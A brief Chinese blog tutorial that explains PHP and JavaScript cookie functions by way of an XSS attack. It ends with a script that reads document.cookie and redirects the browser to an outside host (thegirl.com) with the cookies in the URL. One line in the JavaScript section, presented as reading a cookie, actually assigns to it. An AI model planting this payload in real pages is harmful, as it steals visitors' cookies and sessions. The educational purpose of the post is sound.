通过XSS攻击 来学习php的cookie与JavaScript
2019-02-16 本文已影响0人
行熙
php里面的cookie
- 设置cookie
setcookie(\$name,\$value,\$expire,\$path)
- 获取cookie
$_COOKIE['key']
js里面的cookie
- 设置cookie
document.cookie="id=123"
- 获取cookie
document.cookie=id
xss攻击
获取cookie的信息(比如密码)
<script>
//设置cookie
// let cookie = document.cookie = "UserId = 1";
//获取cookie
let cookie = document.cookie;
//重定向
window.location.href = 'http://www.thegirl.com?' + cookie
//路径 携带cookie
//http://www.thegirl.com/?1;%20UserId=1;%20id=123
</script>